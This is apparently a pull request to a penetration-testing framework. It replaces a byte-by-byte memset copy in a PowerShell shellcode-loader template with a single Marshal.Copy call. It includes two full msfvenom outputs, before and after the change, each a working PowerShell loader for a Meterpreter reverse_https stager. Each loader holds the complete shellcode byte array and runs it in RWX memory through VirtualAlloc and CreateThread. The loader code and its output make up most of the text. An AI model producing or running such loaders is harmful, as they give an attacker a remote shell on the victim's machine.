### PR TITLE
Make PSH template use Marshal.Copy & one-line array

### DIFF
--- a/data/templates/scripts/to_mem_old.ps1.template
+++ b/data/templates/scripts/to_mem_old.ps1.template
@@ -3,8 +3,6 @@ $%{var_syscode} = @"
 public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
 [DllImport("kernel32.dll")]
 public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
-[DllImport("msvcrt.dll")]
-public static extern IntPtr memset(IntPtr dest, uint src, uint count);
 "@
 
 $%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
@@ -13,8 +11,6 @@ $%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -n
 
 $%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
 
-for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
-  $%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
-}
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code},0,$%{var_rwx},$%{var_code}.Length)
 
 $%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)

--- a/lib/rex/powershell/script.rb
+++ b/lib/rex/powershell/script.rb
@@ -75,11 +75,7 @@ module Powershell
       psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
       lines = []
       1.upto(code.length - 1) do |byte|
-        if (byte % 10 == 0)
-          lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
-        else
-          lines.push ",0x#{code[byte].to_s(16)}"
-        end
+        lines.push ",0x#{code[byte].to_s(16)}"
       end
 
       psh << lines.join('') + "\r\n"


### PR DESCRIPTION
This PR modifies the existing Powershell template so that:
1. The container array for the shellcode is declared and initialised in a single line.
2. `memset` from `msvcrt` isn't used any more. This removes the byte-by-byte copies (because they're super frickin' slow).
3. `System.Runtime.InteropServices.Marshal.Copy` is used instead to make a single marshalled call that copies the entire Powershell-based array to the memory allocated by `VirtualAlloc`.

The net effect of this PR is:
- The powershell array that contains the shellcode no longer takes a _long_ time to initialise.
- The single copy call results in a much faster copy. Like... __MUCH__ faster.
- Payloads are actually smaller.

With this PR in place, stageless payloads now run in about 5 or 10 seconds. Beforehand, I gave up waiting for them after 40 minutes.

I'm not sure what else I might be breaking here, so I'd appreciate the comments/eyes of you folks. This does work fine with all versions of PSH I've tested.

Thanks!
## Before

```
./msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=4444 -f psh -t psh
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 582 bytes
$cDmMDZjmFnATzLK = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
"@

$rzAHEyUwQJzOd = Add-Type -memberDefinition $cDmMDZjmFnATzLK -Name "Win32" -namespace Win32Functions -passthru

[Byte[]] $wREXlLGpdfhz = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31
$wREXlLGpdfhz += 0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52
$wREXlLGpdfhz += 0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff
$wREXlLGpdfhz += 0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd
$wREXlLGpdfhz += 0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b
$wREXlLGpdfhz += 0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1
$wREXlLGpdfhz += 0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3
$wREXlLGpdfhz += 0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac
$wREXlLGpdfhz += 0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3
$wREXlLGpdfhz += 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58
$wREXlLGpdfhz += 0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c
$wREXlLGpdfhz += 0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24
$wREXlLGpdfhz += 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f
$wREXlLGpdfhz += 0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65
$wREXlLGpdfhz += 0x74,0x0,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c
$wREXlLGpdfhz += 0x77,0x26,0x7,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53
$wREXlLGpdfhz += 0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53
$wREXlLGpdfhz += 0x53,0x6a,0x3,0x53,0x53,0x68,0x5c,0x11,0x0,0x0
$wREXlLGpdfhz += 0xe8,0x73,0x1,0x0,0x0,0x2f,0x43,0x4c,0x71,0x43
$wREXlLGpdfhz += 0x36,0x41,0x45,0x46,0x31,0x62,0x6e,0x56,0x74,0x74
$wREXlLGpdfhz += 0x53,0x33,0x67,0x33,0x52,0x78,0x38,0x41,0x58,0x37
$wREXlLGpdfhz += 0x30,0x47,0x44,0x69,0x39,0x35,0x43,0x54,0x75,0x7a
$wREXlLGpdfhz += 0x70,0x36,0x39,0x65,0x41,0x70,0x44,0x55,0x56,0x69
$wREXlLGpdfhz += 0x6f,0x59,0x74,0x36,0x57,0x69,0x42,0x46,0x65,0x63
$wREXlLGpdfhz += 0x4d,0x56,0x51,0x57,0x76,0x64,0x4c,0x72,0x74,0x7a
$wREXlLGpdfhz += 0x5f,0x63,0x49,0x79,0x74,0x4d,0x4a,0x73,0x30,0x63
$wREXlLGpdfhz += 0x32,0x70,0x48,0x4e,0x62,0x75,0x65,0x50,0x4a,0x71
$wREXlLGpdfhz += 0x71,0x6d,0x70,0x47,0x45,0x55,0x55,0x69,0x62,0x4c
$wREXlLGpdfhz += 0x34,0x79,0x70,0x6b,0x2d,0x49,0x6e,0x76,0x61,0x53
$wREXlLGpdfhz += 0x35,0x54,0x52,0x58,0x68,0x4e,0x6b,0x71,0x42,0x4d
$wREXlLGpdfhz += 0x43,0x68,0x55,0x38,0x64,0x4c,0x69,0x32,0x41,0x46
$wREXlLGpdfhz += 0x49,0x77,0x47,0x41,0x42,0x44,0x7a,0x4d,0x75,0x37
$wREXlLGpdfhz += 0x45,0x6c,0x32,0x72,0x2d,0x73,0x34,0x6e,0x38,0x53
$wREXlLGpdfhz += 0x50,0x4d,0x2d,0x2d,0x67,0x55,0x4e,0x72,0x74,0x6b
$wREXlLGpdfhz += 0x63,0x36,0x62,0x6b,0x6e,0x34,0x39,0x66,0x64,0x4c
$wREXlLGpdfhz += 0x43,0x75,0x62,0x64,0x4a,0x36,0x4a,0x44,0x4f,0x75
$wREXlLGpdfhz += 0x56,0x39,0x69,0x6f,0x37,0x43,0x52,0x39,0x31,0x5f
$wREXlLGpdfhz += 0x56,0x74,0x4b,0x59,0x6e,0x4f,0x4d,0x33,0x75,0x37
$wREXlLGpdfhz += 0x46,0x4d,0x58,0x62,0x5f,0x33,0x47,0x7a,0x49,0x74
$wREXlLGpdfhz += 0x58,0x78,0x58,0x77,0x4d,0x6a,0x61,0x72,0x49,0x32
$wREXlLGpdfhz += 0x4a,0x57,0x41,0x6c,0x56,0x32,0x69,0x77,0x77,0x49
$wREXlLGpdfhz += 0x37,0x6f,0x6b,0x5a,0x6e,0x73,0x74,0x78,0x45,0x72
$wREXlLGpdfhz += 0x53,0x37,0x77,0x75,0x0,0x50,0x68,0x57,0x89,0x9f
$wREXlLGpdfhz += 0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x0,0x32,0xe0
$wREXlLGpdfhz += 0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55
$wREXlLGpdfhz += 0x2e,0x3b,0xff,0xd5,0x96,0x6a,0xa,0x5f,0x68,0x80
$wREXlLGpdfhz += 0x33,0x0,0x0,0x89,0xe0,0x6a,0x4,0x50,0x6a,0x1f
$wREXlLGpdfhz += 0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x53,0x53
$wREXlLGpdfhz += 0x53,0x53,0x56,0x68,0x2d,0x6,0x18,0x7b,0xff,0xd5
$wREXlLGpdfhz += 0x85,0xc0,0x75,0x8,0x4f,0x75,0xd9,0xe8,0x46,0x0
$wREXlLGpdfhz += 0x0,0x0,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x68
$wREXlLGpdfhz += 0x0,0x0,0x40,0x0,0x53,0x68,0x58,0xa4,0x53,0xe5
$wREXlLGpdfhz += 0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x0
$wREXlLGpdfhz += 0x20,0x0,0x0,0x53,0x56,0x68,0x12,0x96,0x89,0xe2
$wREXlLGpdfhz += 0xff,0xd5,0x85,0xc0,0x74,0xcf,0x8b,0x7,0x1,0xc3
$wREXlLGpdfhz += 0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x77,0xff
$wREXlLGpdfhz += 0xff,0xff,0x31,0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e
$wREXlLGpdfhz += 0x31,0x0,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53
$wREXlLGpdfhz += 0xff,0xd5


$lMcldKwWJ = $rzAHEyUwQJzOd::VirtualAlloc(0,[Math]::Max($wREXlLGpdfhz.Length,0x1000),0x3000,0x40)

for ($YaydZtoNZCDhqAj=0;$YaydZtoNZCDhqAj -le ($wREXlLGpdfhz.Length-1);$YaydZtoNZCDhqAj++) {
  $rzAHEyUwQJzOd::memset([IntPtr]($lMcldKwWJ.ToInt32()+$YaydZtoNZCDhqAj), $wREXlLGpdfhz[$YaydZtoNZCDhqAj], 1) | Out-Null
}

$rzAHEyUwQJzOd::CreateThread(0,0,$lMcldKwWJ,0,0,0)
```
## After

```
./msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=4444 -f psh -t psh
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 529 bytes
$TeJkeswUZk = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@

$DZTbKbZwyTZe = Add-Type -memberDefinition $TeJkeswUZk -Name "Win32" -namespace Win32Functions -passthru

[Byte[]] $nJCohEiKZNu = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x0,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x3,0x53,0x53,0x68,0x5c,0x11,0x0,0x0,0xe8,0x3e,0x1,0x0,0x0,0x2f,0x43,0x4d,0x57,0x4c,0x4c,0x5f,0x30,0x4c,0x37,0x53,0x76,0x2d,0x65,0x50,0x39,0x35,0x71,0x4c,0x70,0x61,0x56,0x77,0x42,0x34,0x5a,0x53,0x5f,0x31,0x4d,0x63,0x41,0x61,0x6b,0x41,0x32,0x65,0x44,0x35,0x4e,0x6d,0x34,0x4c,0x67,0x71,0x50,0x73,0x44,0x5f,0x79,0x55,0x4e,0x6c,0x30,0x53,0x6d,0x36,0x32,0x63,0x69,0x35,0x59,0x67,0x63,0x57,0x65,0x56,0x57,0x36,0x47,0x47,0x75,0x48,0x4a,0x4c,0x42,0x65,0x47,0x58,0x52,0x76,0x55,0x6f,0x35,0x72,0x4f,0x67,0x6f,0x48,0x42,0x79,0x38,0x46,0x4b,0x47,0x48,0x6c,0x56,0x44,0x68,0x6b,0x4b,0x7a,0x65,0x30,0x78,0x58,0x42,0x51,0x4a,0x5a,0x75,0x6b,0x69,0x4e,0x45,0x32,0x67,0x39,0x57,0x36,0x78,0x2d,0x6c,0x78,0x57,0x38,0x58,0x74,0x7a,0x72,0x41,0x4d,0x77,0x6a,0x37,0x44,0x57,0x61,0x52,0x47,0x46,0x76,0x70,0x45,0x30,0x45,0x63,0x39,0x5f,0x6b,0x36,0x52,0x7a,0x73,0x4d,0x6d,0x30,0x34,0x30,0x6b,0x42,0x48,0x5a,0x59,0x77,0x63,0x50,0x67,0x77,0x41,0x31,0x4d,0x78,0x5f,0x42,0x4f,0x70,0x5a,0x6c,0x31,0x73,0x58,0x45,0x76,0x4d,0x0,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x0,0x32,0xe0,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0xa,0x5f,0x68,0x80,0x33,0x0,0x0,0x89,0xe0,0x6a,0x4,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x8,0x4f,0x75,0xd9,0xe8,0x46,0x0,0x0,0x0,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x68,0x0,0x0,0x40,0x0,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x0,0x20,0x0,0x0,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcf,0x8b,0x7,0x1,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x77,0xff,0xff,0xff,0x31,0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x0,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5


$WuBWJDPF = $DZTbKbZwyTZe::VirtualAlloc(0,[Math]::Max($nJCohEiKZNu.Length,0x1000),0x3000,0x40)

[System.Runtime.InteropServices.Marshal]::Copy($nJCohEiKZNu,0,$WuBWJDPF,$nJCohEiKZNu.Length)

$DZTbKbZwyTZe::CreateThread(0,0,$WuBWJDPF,0,0,0)
```
